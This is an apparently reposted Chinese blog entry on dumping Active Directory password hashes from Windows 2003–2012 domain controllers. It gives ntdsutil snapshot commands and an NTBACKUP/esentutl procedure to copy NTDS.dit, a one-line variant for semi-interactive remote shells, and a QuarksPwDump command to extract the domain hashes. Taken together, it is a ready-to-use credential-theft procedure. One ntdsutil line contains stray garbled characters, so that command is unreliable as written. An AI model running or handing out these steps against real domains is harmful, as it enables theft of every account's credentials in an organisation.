windows 2003 windows 2008 windows 2012 导出域控hash的方法

Posted 懒惰不懒

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows 2003 windows 2008 windows 2012 导出域控hash的方法相关的知识,希望对你有一定的参考价值。

quarkspwdump作者介绍的用法:

1. Windows 2008
   
  Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
  filesystem snapshots while the operating is running and writing to current backuped files.
   
  Here is a way to backup NTDS.dit file while a domain controller is running:
   
  #ntdsutil
  #snapshot
  #activate instance ntds
  #create
  #mount {GUID}
  #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
  #unmount {GUID}
  #quit
  #quit
   
  If AD server hasn‘t the "AD DS role", you have to use dsdbutil.exe command in the same way.
   
   
   
 2. Windows 2003  
  On this version, VSS has been implemented but not NTDS-type snapshots.
  But you can use ntbackup tool, here is the procedure:
   
  - Launch NTBACKUP gui
  - Use backup wizard (advanced)
  - Choose to save system state only and choose output filename
  - Wait some minutes
  - Use restore wizard (advanced)
  - Choise your backup, click next and use advanced button
  - Choose to restore file on another location (c:\tmp\ for example)
  - Choose to overwrite everything and next uncheck all restoration parameters
  - Validate and wait some minutes
  - Open a command shell to "c:\tmp\Active Directory"
  - We need to repair the database with this command
  #esentutl /p ntds.dit
  - Validate warning and wait some minutes
   
  ntds.dit file can now be used with quarkspwdump.

 

其中

#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
#unmount {GUID}
#quit
#quit

适用于可交互式或直接登录状态。

如果是半交互式的,可以采用如下方法(网上看到的用法):

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
ntdsutil  snapshot  "mount {GUID}"  quit  quit
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit
ntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  E
ntdsutil  snapshot  "delete {GUID}"  quit  quit

 

最后

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

 

以上是关于windows 2003 windows 2008 windows 2012 导出域控hash的方法的主要内容,如果未能解决你的问题,请参考以下文章

AD从windows 2003升级到windows 2008

windows 2003 windows 2008 windows 2012 导出域控hash的方法

Windows2003操作系统SQL Server 2008安装图解(详细)

如何将windows server 2003AD升级2008AD

windows 2003 2008安装IIS + PHP + MYSQL的一般方法

windows 2003 IIS6.0 迁移至windows 2008 IIS7.0